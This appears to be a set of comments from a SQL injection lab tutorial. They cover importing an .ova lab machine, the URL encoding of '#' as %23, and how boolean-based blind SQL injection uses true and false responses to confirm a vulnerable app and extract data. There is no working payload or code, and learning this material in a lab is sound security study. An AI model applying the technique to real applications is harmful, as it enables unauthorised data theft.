just download the .ova file double click and click import that is it man

%23 is the url encoded value of # it means %23=# as we are writing in url we cannot directly write the "#" therefore we have use %23 as url encoded value Hope this help :)

This kind of technique is used when you don't have an explicit response from the server to determine if your query was correct or not or even interpreted, at that point you need to ask the server for true and false questions in order to steal data. One method to determine if the app is vulnerable is to check for the response when you ask for a true and false statements, i.e: when TRUE you will receive one kind of response(a normal page let's say), when FALSE you will receive a diferente response (e.g page with an error), if that happened you can determine that the app is vuln for injection since you are getting a response for your crafted TRUE and FALSE questions (query). So it proves that... if the app if vuln or not, the you can proceed with your injection methods.

i also thought that but it is, it's called boolean-based but it would be more practical if he use another attack like time-based